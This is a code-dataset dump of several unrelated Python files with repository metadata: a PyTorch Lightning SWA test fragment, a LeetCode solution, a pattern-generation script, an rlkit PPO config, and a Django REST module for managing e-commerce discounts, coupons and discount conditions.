"""Test to ensure SWA Callback is injected when `stochastic_weight_avg` is provided to the Trainer."""
class TestModel(BoringModel):
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.layer.parameters(), lr=0.1)
return optimizer
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
callbacks=StochasticWeightAveraging(swa_lrs=1e-3) if use_callbacks else None,
stochastic_weight_avg=stochastic_weight_avg,
limit_train_batches=4,
limit_val_batches=4,
max_epochs=2,
)
trainer.fit(model)
if use_callbacks or stochastic_weight_avg:
assert sum(1 for cb in trainer.callbacks if isinstance(cb, StochasticWeightAveraging)) == 1
assert trainer.callbacks[0]._swa_lrs == [1e-3 if use_callbacks else 0.1]
else:
assert all(not isinstance(cb, StochasticWeightAveraging) for cb in trainer.callbacks)
def test_swa_deepcopy(tmpdir):
"""Test to ensure SWA Callback doesn't deepcopy dataloaders and datamodule potentially leading to OOM."""
class TestSWA(StochasticWeightAveraging):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.on_before_accelerator_backend_setup_called = False
def on_before_accelerator_backend_setup(self, trainer: "Trainer", pl_module: "LightningModule"):
super().on_before_accelerator_backend_setup(trainer, pl_module)
assert self._average_model.train_dataloader is not pl_module.train_dataloader
assert self._average_model.train_dataloader.__self__ == self._average_model
assert self._average_model.trainer is None
self.on_before_accelerator_backend_setup_called = True
model = BoringModel()
swa = TestSWA()
trainer = Trainer(default_root_dir=tmpdir, callbacks=swa, fast_dev_run=True)
trainer.fit(model, train_dataloader=DataLoader(RandomDataset(32, 2)))
assert swa.on_before_accelerator_backend_setup_called
def test_swa_multiple_lrs(tmpdir):
swa_lrs = [0.123, 0.321]
class TestModel(BoringModel):
def __init__(self):
super(BoringModel, self).__init__()
self.layer1 = torch.nn.Linear(32, 32)
self.layer2 = torch.nn.Linear(32, 2)
def forward(self, x):
x = self.layer1(x)
x = self.layer2(x)
return x
def configure_optimizers(self):
params = [{"params": self.layer1.parameters(), "lr": 0.1}, {"params": self.layer2.parameters(), "lr": 0.2}]
return torch.optim.Adam(params)
def on_train_epoch_start(self):
optimizer = trainer.optimizers[0]
assert [pg["lr"] for pg in optimizer.param_groups] == [0.1, 0.2]
assert [pg["initial_lr"] for pg in optimizer.param_groups] == swa_lrs
assert [pg["swa_lr"] for pg in optimizer.param_groups] == swa_lrs
self.on_train_epoch_start_called = True
model = TestModel()
swa_callback = StochasticWeightAveraging(swa_lrs=swa_lrs)
trainer = Trainer(
default_root_dir=tmpdir,
callbacks=swa_callback,
fast_dev_run=1,
)
trainer.fit(model)
assert model.on_train_epoch_start_called
| [
"noreply@github.com"
] | noreply@github.com |
ed6cc8e324e0e9d722dcff91f07aa8abc8df16f3 | a606893da1e354c7c617d0c9247b23118be2813a | /模拟考试/7_20/t8.py | 178465ca3405c74f23f6334c46828faea35f0af3 | [] | no_license | lindo-zy/leetcode | 4ce6cb9ded7eeea0a6953b6d8152b5a9657965da | f4277c11e620ddd748c2a2f3d9f5f05ee58e5716 | refs/heads/master | 2023-07-22T06:19:00.589026 | 2023-07-16T12:35:14 | 2023-07-16T12:35:14 | 229,958,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
from itertools import product
from typing import List
class Solution:
def letterCombinations(self, digits: str) -> List[str]:
ds = {2: 'abc', 3: 'def', 4: "ghi",
5: 'jkl', 6: 'mno', 7: 'pqrs',
8: 'tuv', 9: 'wxyz'}
words = [ds[int(i)] for i in digits]
return [''.join(i) for i in list(product(*words)) if i]
if __name__ == '__main__':
s = Solution()
digits = "234"
print(s.letterCombinations(digits))
| [
"492201845@qq.com"
] | 492201845@qq.com |
f889a1191f24e0efa33abc9e969d0f9330c75227 | 5a094639f077d85f530c1df874aa4aaf39087757 | /basicPatternGeneration.py | b25271946dbaf5bf73ec794226b04f94503a7edd | [] | no_license | priyanshu1994/LAD-Tools-BTP- | 6936003c9887026f1b0a68526000423ae019dc0b | d0d9c3e27520c7f8a97de905832220e8303d62d4 | refs/heads/master | 2021-01-21T13:29:59.522102 | 2016-05-05T06:55:34 | 2016-05-05T06:55:34 | 53,981,183 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | import binarisationVariables as BV
from excelFileReader import *
import json
def convertBinaryToInt(list):
val = 0
for attribute in list:
val = val * 2 + attribute
val = val - 1
val = val / 2
return val
def basicPatternGeneration():
dict = {}
i = 0
for item in BV.items:
if item[BV.numberOfAttributes - 1] == 1:
val = convertBinaryToInt(item)
dict[val] = 1
# print dict
json.dump(dict, open("patterns.txt","w")) | [
"priyanshu581994@gmail.com"
] | priyanshu581994@gmail.com |
9e705405bf51c0c78f3aa9cea75c16792a078e88 | 197f89938ff9b056c32b5fcdd9386c02f02f5ca8 | /rlkit/examples/variant.py | fc279c71bab63b2a79dd28c176fcb00a5a981331 | [
"MIT"
] | permissive | cvigoe/DRL4MAAS | b8a4a4529c1df8bfe698b83fdffd05646a54cd82 | 95539197c9b82a34f9128fd265749d0f8f76157f | refs/heads/main | 2023-08-11T05:56:16.587227 | 2021-09-19T21:40:18 | 2021-09-19T21:40:18 | 404,843,072 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,836 | py | variant = dict(
mlflow_uri="http://128.2.210.74:8080",
gpu=False,
algorithm="PPO",
version="normal",
layer_size=64, # Need to tune & fix in code
replay_buffer_size=int(3E3),
algorithm_kwargs=dict(
min_num_steps_before_training=0,
num_epochs=3000,
num_eval_steps_per_epoch=1000,
num_train_loops_per_epoch=10,
num_expl_steps_per_train_loop=2048,
num_trains_per_train_loop=100,
batch_size=256,
max_path_length=100,
clear_buffer_every_train_loop=True,
),
trainer_kwargs=dict(
epsilon=0.25, # Need to tune
discount=.99, # Need to tune
intrinsic_discount=.9999,
policy_lr=3E-4, # Need to tune
val_lr=3E-4, # No need to use different
use_rnd=False,
rnd_coef=10,
predictor_update_proportion=0.25,
),
rnd_kwargs=dict(
rnd_output_size=512,
rnd_lr=3E-4,
rnd_latent_size=64,
),
target_kwargs=dict(
tdlambda=0.95,
target_lookahead=15,
use_dones_for_rnd_critic=False,
),
policy_kwargs=dict(
std=0.1,
),
)
env_variant = dict(
env_str='Swimmer-v2',
)
# env_variant = dict(
# env_str='activesearchrlpoissonmlemap-v0',
# lam=1,
# sigma2=1,
# num_agents=5,
# num_hypotheses=30,
# num_timesteps=30,
# num_EA_iterations=10,
# EA_tolerance=0.0001,
# cost_iterations=10,
# upper_limit_N=10,
# log_space_resolution=100,
# MLE_regularizer=.1,
# WASSERSTEIN_ITERS=100,
# verbose=False,
# adaptive_grid=False,
# direct_wasserstein=True,
# fisher_in_state=False,
# reward_shaping=False,
# )
| [
"cvigoe@gmail.com"
] | cvigoe@gmail.com |
b8b2d770fa56dc2737b20940196ba21100eeede9 | 85eff920f0f285abad84c2f6bcfd4f236f3976ab | /webservices/views/product/Discount.py | 2addd7a58ad5beee740e07d16fa28b10c0c2115c | [] | no_license | obxlifco/Web-Picking-App-GoGrocery | 8cf5f7924005a19764e5c4722a47bfd963965f2e | 6b084547bed2af43a67bada313d68e56f4228f96 | refs/heads/main | 2023-05-26T08:32:30.297317 | 2021-06-12T10:05:01 | 2021-06-12T10:05:01 | 315,206,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,390 | py | from webservices.models import *
from django.http import Http404
from webservices.serializers import *
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
from rest_framework.parsers import JSONParser
from datetime import date,datetime
from rest_framework import generics
from itertools import chain
from django.core import serializers
from django.http import HttpResponse
from django.db.models import Q
from django.core.files.storage import FileSystemStorage
from webservices.views import loginview
from django.utils.crypto import get_random_string
import datetime
import json
import random
import os
import ast
import xlsxwriter
import xlrd
import sys
import traceback
from webservices.views.common import common
# class DiscountSet is used to insert Discount
class DiscountSet(generics.ListAPIView):
def post(self, request, format=None):
company_db = loginview.db_active_connection(request)
has_multy = request.data['value']
name = has_multy['name']
# namelower = name.lower()
# name1 = namelower.replace(" ", "-")
# nametrns = name1.translate(
# {ord(c): "" for c in "!@#$%^&*()[]{};:,./<>?\|`~=+\"\'"})
# slugname = slugify(nametrns)
# cnt = EngageboostDiscountMasters.objects.filter(name=name).count()
# if cnt == 0:
# cnt = cnt
# slugname = slugname
# elif cnt == 1:
# cnt = cnt
# slugname = slugname + '1'
# else:
# slugname = slugname + str(cnt)
# slugname = common.create_discount_slug(name)
if 'DiscountMastersConditions' in has_multy.keys():
has_multy.pop('DiscountMastersConditions')
if 'DiscountMastersCoupons' in has_multy.keys():
has_multy.pop('DiscountMastersCoupons')
discount_master_type = has_multy['discount_master_type']
product_id_qty = ""
if 'product_id_qty' in has_multy.keys():
product_id_qty = has_multy['product_id_qty']
is_mul = has_multy['has_multiplecoupons']
d1 = {'created': datetime.datetime.now(), 'modified': datetime.datetime.now(), 'used_coupon': 0}
serializer_data = dict(has_multy, **d1)
if is_mul == 'n':
if discount_master_type != 0:
coupon_code = has_multy['coupon_code']
if has_multy['coupon_prefix'] is None:
has_multy['coupon_prefix'] = ""
if has_multy['coupon_suffix'] is None:
has_multy['coupon_suffix'] = ""
if has_multy['coupon_prefix'] is not None and has_multy['coupon_prefix'] != "":
has_multy['coupon_code'] = str(has_multy['coupon_code']).strip(str(has_multy['coupon_prefix']))
coupon_code = str(has_multy['coupon_prefix']).strip() + str(coupon_code).strip()
if has_multy['coupon_suffix'] is not None and has_multy['coupon_suffix'] != "":
has_multy['coupon_code'] = str(has_multy['coupon_code']).strip() + str(
has_multy['coupon_suffix']).strip()
coupon_code = str(coupon_code).strip() + str(has_multy['coupon_suffix']).strip()
serializer_data['coupon_code'] = coupon_code
cnt = EngageboostDiscountMasters.objects.filter(coupon_code=coupon_code).count()
if cnt == 0:
if 'id' in has_multy.keys():
discount_id = has_multy['id']
creditObj = EngageboostDiscountMasters.objects.get(id=discount_id)
serializer_data.pop("id")
serializer = DiscountMasterSerializer(creditObj, data=serializer_data, partial=True)
else:
serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
if serializer.is_valid():
serializer.save()
obj = EngageboostDiscountMasters.objects.latest('id')
last_id = obj.id
if product_id_qty:
product_id_qtys = product_id_qty.split(",")
if len(product_id_qtys) > 0:
EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=last_id).delete()
for item in product_id_qtys:
pro_qty = item.split("@")
current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
EngageboostDiscountFreebieMappings.objects.create(discount_master_id=last_id,
product_id=pro_qty[0],
qty=pro_qty[1],
created=current_date,
modified=current_date)
data = {
'status': 1,
'api_status': {"id": last_id},
'message': 'Successfully Inserted',
}
return Response(data)
else:
data = {
'status': 0,
'api_status': serializer.errors,
'message': 'Data Not Found',
}
return Response(data)
else:
data = {
'status': 0,
'message': 'Coupon code already exists',
}
return Response(data)
else:
if 'id' in has_multy.keys():
discount_id = has_multy['id']
creditObj = EngageboostDiscountMasters.objects.get(id=discount_id)
serializer_data.pop("id")
serializer = DiscountMasterSerializer(creditObj, data=serializer_data, partial=True)
else:
serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
if serializer.is_valid():
serializer.save()
obj = EngageboostDiscountMasters.objects.latest('id')
last_id = obj.id
if product_id_qty:
product_id_qtys = product_id_qty.split(",")
if len(product_id_qtys) > 0:
EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=last_id).delete()
for item in product_id_qtys:
pro_qty = item.split("@")
current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
EngageboostDiscountFreebieMappings.objects.create(discount_master_id=last_id,
product_id=pro_qty[0], qty=pro_qty[1],
created=current_date,
modified=current_date)
data = {
'status': 1,
'api_status': {"id": last_id},
'message': 'Successfully Inserted',
}
return Response(data)
else:
data = {
'status': 0,
'api_status': serializer.errors,
'message': 'Data Not Found',
}
return Response(data)
else:
d1 = request.data['value']
d1 = {'created': datetime.datetime.now(), 'modified': datetime.datetime.now()}
serializer_data = dict(has_multy, **d1)
if 'id' in d1.keys():
discount_id = d1['id']
creditObj = EngageboostDiscountMasters.objects.get(id=discount_id)
serializer_data.pop("id")
serializer = DiscountMasterSerializer(creditObj, data=serializer_data, partial=True)
else:
serializer = DiscountMasterSerializer(data=serializer_data, partial=True)
if serializer.is_valid():
serializer.save()
obj = EngageboostDiscountMasters.objects.latest('id')
last_id = obj.id
if product_id_qty:
product_id_qtys = product_id_qty.split(",")
if len(product_id_qtys) > 0:
EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=last_id).delete()
for item in product_id_qtys:
pro_qty = item.split("@")
current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
EngageboostDiscountFreebieMappings.objects.create(discount_master_id=last_id,
product_id=pro_qty[0], qty=pro_qty[1],
created=current_date,
modified=datetime.datetime.now())
if 'multiple_coupons' in has_multy.keys():
if request.data['multiple_coupons']:
list_of_multiple_coupons = request.data['multiple_coupons']
else:
list_of_multiple_coupons = None
else:
list_of_multiple_coupons = None
if list_of_multiple_coupons:
for coupon_code in list_of_multiple_coupons:
cnt = EngageboostDiscountMastersCoupons.objects.filter(coupon_code=coupon_code).count()
if cnt == 0:
User = EngageboostDiscountMastersCoupons.objects.create(website_id=has_multy['website_id'],
discount_master_id=last_id,
coupon_code=coupon_code,
created=datetime.datetime.now())
data = {
'status': 1,
'api_status': {"id": last_id},
'message': 'Successfully Inserted',
}
else:
data = {
'status': 0,
'message': 'Coupon code already exists',
}
else:
no_of_coupon = has_multy["number_of_coupon"]
flag = 0
sresult = 1
list_of_multiple_coupons = []
prefix = suffix = ""
if 'prefix' in has_multy.keys():
prefix = has_multy['prefix']
if 'suffix' in has_multy.keys():
suffix = has_multy['suffix']
while sresult != -1 and flag < no_of_coupon:
res = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
res = str(prefix) + str(res).lower() + str(suffix)
result = EngageboostDiscountMastersCoupons.objects.filter(isdeleted='n',
coupon_code=res).count()
if result > 0:
pass
else:
list_of_multiple_coupons.append(res)
sresult = int(flag)
flag += 1
for coupon_code in list_of_multiple_coupons:
User = EngageboostDiscountMastersCoupons.objects.create(website_id=has_multy['website_id'],
discount_master_id=last_id,
coupon_code=coupon_code,
created=datetime.datetime.now())
data = {
'status': 1,
'api_status': {"id": last_id},
'message': 'Successfully Inserted',
}
return Response(data)
else:
data = {
'status': 0,
'api_status': serializer.errors,
'message': 'Data Not Found',
}
return Response(data)
# class DiscountList is used to fetch list of all Discount
class DiscountList(generics.ListAPIView):
def get_object(self, pk,request):
company_db = loginview.db_active_connection(request)
try:
return EngageboostDiscountMasters.objects.using(company_db).get(pk=pk)
except EngageboostDiscountMasters.DoesNotExist:
raise Http404
#///////////////////Fetch Single Row
def get(self, request, pk, format=None):
company_db = loginview.db_active_connection(request)
coupon_code=[]
dis = self.get_object(pk,request)
serializer = DiscountMasterSerializer(dis)
couponcode1=EngageboostDiscountMastersCoupons.objects.using(company_db).all().filter(discount_master_id=pk)
customergrp = EngageboostCustomerGroup.objects.using(company_db).all().filter(isdeleted='n',
isblocked='n').order_by('name')
customer = CustomerGroupSerializer(customergrp, many=True)
for coupon in couponcode1:
coupon_array={'coupon_code':coupon.coupon_code,'is_used':coupon.is_used}
coupon_code.append(coupon_array)
if(serializer):
data ={
'status':1,
'api_status':serializer.data,
'multiple_coupons':coupon_code,
'customer_group':customer.data,
'message':'',
}
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
# Update Discount
def put(self, request, pk, format=None,partial=True):
company_db = loginview.db_active_connection(request)
dis = self.get_object(pk,request)
coupon_code = request.data['value']['coupon_code']
#------Binayak Start 11-03-2021-----#
warehouse = request.data['value']['warehouse']
# print("======warehouse======", warehouse)
# ------Binayak End 11-03-2021-----#
has_multy = request.data['value']
if 'DiscountMastersConditions' in has_multy.keys():
has_multy.pop('DiscountMastersConditions')
if 'DiscountMastersCoupons' in has_multy.keys():
has_multy.pop('DiscountMastersCoupons')
is_mul = has_multy['has_multiplecoupons']
discount_master_type = has_multy['discount_master_type']
# print('Chakradhar Working', is_mul, discount_master_type)
product_id_qty = ""
if 'product_id_qty' in has_multy.keys():
product_id_qty = has_multy['product_id_qty']
d1={'modified':datetime.datetime.now()}
serializer_data=dict(has_multy,**d1)
if is_mul == 'n':
if discount_master_type != 0:
cnt=EngageboostDiscountMasters.objects.using(company_db).filter(coupon_code=coupon_code).filter(~Q(id=pk)).count()
if cnt ==0:
serializer = DiscountMasterSerializer(dis,data=serializer_data,partial=True)
if serializer.is_valid():
latest = serializer.save()
if product_id_qty:
product_id_qtys = product_id_qty.split(",")
if len(product_id_qtys)>0:
EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=latest.id).delete()
for item in product_id_qtys:
pro_qty = item.split("@")
current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
EngageboostDiscountFreebieMappings.objects.create(discount_master_id=latest.id,product_id=pro_qty[0],qty=pro_qty[1],created=current_date,modified=current_date)
data = {
'status':1,
'api_status':'',
'message':'Successfully Updated',
}
return Response(data)
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
else:
data ={
'status':0,
'message':'Coupon code is already exists',
}
return Response(data)
else:
serializer = DiscountMasterSerializer(dis,data=serializer_data,partial=True)
if serializer.is_valid():
prev_products = list(EngageboostDiscountMastersConditions.objects.filter(discount_master_id = pk).values_list('all_product_id',flat=True))
prev_warehouses = EngageboostDiscountMasters.objects.filter(id=pk).first().warehouse_id
latest = serializer.save()
if product_id_qty:
product_id_qtys = product_id_qty.split(",")
if len(product_id_qtys)>0:
EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=latest.id).delete()
for item in product_id_qtys:
pro_qty = item.split("@")
current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
EngageboostDiscountFreebieMappings.objects.create(discount_master_id=latest.id,product_id=pro_qty[0],qty=pro_qty[1],created=current_date,modified=current_date)
data ={
'status':1,
'api_status':'',
'message':'Successfully Updated',
}
objproduct_list = EngageboostDiscountMastersConditions.objects.filter(discount_master_id = pk).values_list('all_product_id',flat=True)
if(prev_products):
objproduct_list = list(objproduct_list)
objproduct_list.extend(prev_products)
objproduct_list = list(set(objproduct_list))
# if objproduct_list :
# for elastic_product_id in objproduct_list:
# if(elastic_product_id is not None):
# print('Hello', elastic_product_id)
# if("," in elastic_product_id):
# prod_lst = elastic_product_id.split(",")
# elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst)
# else:
# elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)])
if objproduct_list:
# print("=====objproduct_list=====", objproduct_list)
#-------Binayak start 12-03-2021------#\
prooduct_id_list = []
for prod in objproduct_list:
if prod:
prod = prod.split(',')
# prev_products = list(prev_products.split(","))
# print("=====prev_products=====", prev_products)
# print("=====prev_products=====", type(prev_products))
prooduct_id_list.extend(prod)
# print("=====prooduct_id_list=====", prooduct_id_list)
prooduct_id_list = list(map(int, prooduct_id_list))
# if prooduct_id_list:
# elastic = common.update_bulk_elastic('EngageboostProducts', prooduct_id_list,
# 'channel_currency_product_price', 'update', warehouse)
#-------Binayak end 12-03-2021------#
# for elastic_product_id in objproduct_list:
# if(elastic_product_id is not None):
# try:
# if("," in elastic_product_id):
# prod_lst = elastic_product_id.split(",")
# elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst,'channel_currency_product_price','update', warehouse)
# else:
# print("=====in here 5=====")
# elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update', warehouse)
# except:
# print("=====in here 6=====")
# elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update', warehouse)
EngageboostUpdateQueue.objects.create(discount_id=pk,
process_type='single',
operation_for='discount',
prev_warehouses=prev_warehouses)
return Response(data)
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
else:
d1= request.data['value']
d2 = request.data['multiple_coupons']
d1={'modified':datetime.datetime.now()}
serializer_data=dict(has_multy,**d1)
serializer = DiscountMasterSerializer(dis,data=serializer_data,partial=True)
if serializer.is_valid():
latest = serializer.save()
if product_id_qty:
product_id_qtys = product_id_qty.split(",")
if len(product_id_qtys)>0:
EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=latest.id).delete()
for item in product_id_qtys:
pro_qty = item.split("@")
current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
EngageboostDiscountFreebieMappings.objects.create(discount_master_id=latest.id,product_id=pro_qty[0],qty=pro_qty[1],created=current_date,modified=current_date)
for is_mul in d2:
cnt= EngageboostDiscountMastersCoupons.objects.using(company_db).filter(coupon_code=is_mul['coupon_code']).filter(~Q(discount_master_id=pk)).count()
if cnt ==0:
User = EngageboostDiscountMastersCoupons.objects.using(company_db).create(website_id=has_multy['website_id'],discount_master_id=pk,coupon_code=is_mul['coupon_code'],modified=datetime.datetime.now().date())
data ={
'status':1,
'api_status':'',
'message':'Successfully Updated',
}
else:
data ={
'status':0,
'api_status':'',
'message':'Coupon code is already exists',
}
return Response(data)
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
# Set discount conditions(Insert new records)
# Save discount data after save condition by cds on 11th Oct 2019
class DiscountConditions(generics.ListAPIView):
def post(self, request, format=None):
datas=[]
company_db = loginview.db_active_connection(request)
discount_master_id=request.data['discount_master_id']
warehouse = EngageboostDiscountMasters.objects.filter(id=discount_master_id).values_list('warehouse_id',
flat=True)
prev_products = list(EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id = discount_master_id).values_list('all_product_id',flat=True))
prev_conditions = EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).all()
prev_pro_ids = []
new_pro_ids = []
# if cnt >0:
if prev_conditions:
prev_conditions_serializar = DiscountConditionsSerializer(prev_conditions, many=True)
prev_conditions_serializar = prev_conditions_serializar.data
product_in_arr = []
product_out_arr = []
for ind_pre_cond in prev_conditions_serializar:
if ind_pre_cond["all_product_id"]:
product_id_array = ind_pre_cond["all_product_id"].split(",")
if ind_pre_cond["condition"] == "==":
product_in_arr = product_in_arr + product_id_array
else:
product_out_arr = product_out_arr + product_id_array
elif ind_pre_cond["all_category_id"]:
category_id_array = ind_pre_cond["all_category_id"].split(",")
find_category_products = EngageboostProductCategories.objects.filter(category_id__in=category_id_array).values_list('product_id', flat= True).distinct()
find_category_products = list(find_category_products)
if ind_pre_cond["condition"] == "==":
product_in_arr = product_in_arr + find_category_products
else:
product_out_arr = product_out_arr + find_category_products
prev_pro_ids = list(set(product_in_arr) - set(product_out_arr)) #product_in_arr-product_out_arr
EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).delete()
has_multy=request.data['value']
for data in has_multy:
has_record = EngageboostDiscountMastersConditions.objects.using(company_db).last()
if has_record:
last_entry_of_table = EngageboostDiscountMastersConditions.objects.order_by('-id').latest('id')
row_id = int(last_entry_of_table.id)+int(1)
else:
row_id = 1
d1={"id":row_id};
data=dict(data,**d1)
# datas.append(data)
# serializer = DiscountConditionsSerializer(data=data,partial=True)
serializer = EngageboostDiscountMastersConditions.objects.using(company_db).create(**data)
# objproduct_list = EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id = discount_master_id).values_list('all_product_id',flat=True)
# New
new_conditions = EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).all()
new_conditions_serializar = DiscountConditionsSerializer(new_conditions, many=True)
new_conditions_serializar = new_conditions_serializar.data
new_product_in_arr = []
new_product_out_arr = []
for ind_pre_cond in new_conditions_serializar:
if ind_pre_cond["all_product_id"]:
product_id_array = ind_pre_cond["all_product_id"].split(",")
if ind_pre_cond["condition"] == "==":
new_product_in_arr = new_product_in_arr + product_id_array
else:
new_product_out_arr = new_product_out_arr + product_id_array
elif ind_pre_cond["all_category_id"]:
category_id_array = ind_pre_cond["all_category_id"].split(",")
find_category_products = EngageboostProductCategories.objects.filter(category_id__in=category_id_array).values_list('product_id', flat= True).distinct()
find_category_products = list(find_category_products)
if ind_pre_cond["condition"] == "==":
new_product_in_arr = new_product_in_arr + find_category_products
else:
new_product_out_arr = new_product_out_arr + find_category_products
new_pro_ids = list(set(new_product_in_arr) - set(new_product_out_arr)) #product_in_arr-product_out_arr
# End New
diff_ids = prev_pro_ids + new_pro_ids
final_arr = list(set(diff_ids))
objproduct_list = prev_pro_ids # It is static. Checking for testing purpose
# if final_arr :
# for elastic_product_id in final_arr:
# if(elastic_product_id != "" and elastic_product_id is not None):
# elastic_product_id = str(elastic_product_id)
# if (elastic_product_id.find(',') != -1):
# prod_lst = elastic_product_id.split(",")
# for prod_id in prod_lst:
# if(prod_id!=""):
# elastic = common.save_data_to_elastic(int(prod_id),'EngageboostProducts')
# else:
# elastic = common.save_data_to_elastic(int(elastic_product_id),'EngageboostProducts')
if final_arr:
# for elastic_product_id in final_arr:
# if(elastic_product_id != "" and elastic_product_id is not None):
# print('Hello', elastic_product_id)
# try:
# if("," in elastic_product_id):
# prod_lst = elastic_product_id.split(",")
# elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst,'channel_currency_product_price','update')
# else:
# elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
# except:
# elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
prooduct_id_list = []
# print("======final_arr=======", final_arr)
for prev_prov in final_arr:
if type(prev_prov) == 'str':
prev_prov = prev_prov.split(',')
prooduct_id_list.extend(prev_prov)
else:
prooduct_id_list.append(prev_prov)
prooduct_id_list = list(map(int, prooduct_id_list))
warehouse_lists = []
if prooduct_id_list:
for warehouse_ids in warehouse:
# print('======warehouse======', warehouse_ids)
warehouse_lists.extend(list(map(int, list(warehouse_ids.split(',')))))
# warehouse = list(map(int, list(warehouse)))
prev_pro_ids = list(map(str, prev_pro_ids))
EngageboostUpdateQueue.objects.create(discount_id=discount_master_id,
process_type='single',
operation_for='discount',
prev_products=", ".join(prev_pro_ids))
#
# elastic = common.update_bulk_elastic('EngageboostProducts', prooduct_id_list,
# 'channel_currency_product_price',
# 'update', warehouse_lists)
if serializer:
# serializer.save()
data ={
'status':1,
'api_status':'',
'message':'Successfully Inserted',
}
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
# return Response(datas)
# Set discount conditions Get single row and update
class DiscountConditionsSet(generics.ListAPIView):
def get_object(self, pk,request):
company_db = loginview.db_active_connection(request)
try:
return EngageboostDiscountMastersConditions.objects.using(company_db).get(pk=pk)
except EngageboostDiscountMastersConditions.DoesNotExist:
raise Http404
def get(self, request, pk, format=None,many=True):
company_db = loginview.db_active_connection(request)
Conditions = EngageboostDiscountMastersConditions.objects.using(company_db).all().filter(discount_master_id=pk)
serializer = DiscountConditionsSerializer(Conditions,many=True)
# data1 = EngageboostCustomers.objects.using(company_db).all().filter(isdeleted='n',isblocked='n').order_by('-id')
# serializer1 = CustomerSerializer(data1, many=True)
# Channels = EngageboostChannels.objects.using(company_db).all().filter(isdeleted='n',isblocked='n').order_by('-id')
# Channel = ChannelsSerializer(Channels, many=True)
# Categories = EngageboostCategoryMasters.objects.using(company_db).all().filter(isdeleted='n',isblocked='n',parent_id=0).order_by('-id')
# Category = CategoriesSerializer(Categories, many=True)
# product = EngageboostProducts.objects.using(company_db).all().filter(isblocked='n',isdeleted='n')
# product = BasicinfoSerializer(product,many=True)
if(serializer):
data ={
'Rows':serializer.data,
# 'customergrp':serializer1.data,
# 'category':Category.data,
# 'channel':Channel.data,
# 'product':product.data
}
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
# def put(self, request, pk, format=None,many=True):
# Reviews = self.get_object(pk,request)
# has_multy=request.data['value']
# for data1 in has_multy:
# #print(data1)
# serializer = DiscountConditionsSerializer(Reviews,data=data1)
# if serializer.is_valid():
# serializer.save()
# data ={
# 'status':1,
# 'message':'Successfully Updated',
# }
# else:
# data ={
# 'status':0,
# 'message':'Data Not Found',
# }
# return Response(data)
# Fetch All CustomerGroup Record for page load web services
class CustomerGroupDiscount(generics.ListAPIView):
def get_object(request, discount_master_id, format=None):
company_db = loginview.db_active_connection(request)
try:
return EngageboostDiscountMastersConditions.objects.using(company_db).get(discount_master_id=discount_master_id)
except EngageboostDiscountMastersConditions.DoesNotExist:
raise Http404
def get(self, request,discount_master_id, format=None,many=True):
company_db = loginview.db_active_connection(request)
# pk=request.data.get('pk')
user = EngageboostDiscountMastersConditions.objects.using(company_db).all().filter(discount_master_id=discount_master_id)
serializer = DiscountConditionsSerializer(user,many=True)
#####################Query Generation#################################
if request.data.get('search') and request.data.get('order_by'):
key=request.data.get('search')
order_by=request.data.get('order_by')
order_type=request.data.get('order_type')
if(order_type=='+'):
order=order_by
else:
order='-'+order_by
result = EngageboostCustomers.objects.using(company_db).all().order_by(order).filter(Q(first_name__icontains=key)|Q(last_sku__icontains=key)|Q(email__icontains=key))
elif request.data.get('search'):
key=request.data.get('search')
result = EngageboostCustomers.objects.using(company_db).all().order_by('-id').filter(Q(first_name__icontains=key)|Q(last_sku__icontains=key)|Q(email__icontains=key))
elif request.data.get('order_by'):
order_by=request.data.get('order_by')
order_type=request.data.get('order_type')
if(order_type=='+'):
order=order_by
else:
order='-'+order_by
result = EngageboostCustomers.objects.using(company_db).all().order_by(order)
else:
result = EngageboostCustomers.objects.using(company_db).all().order_by('-id')
result=result.filter(~Q(pk=discount_master_id)).filter(isblocked='n',isdeleted='n')
#print(request.data.get('search'))
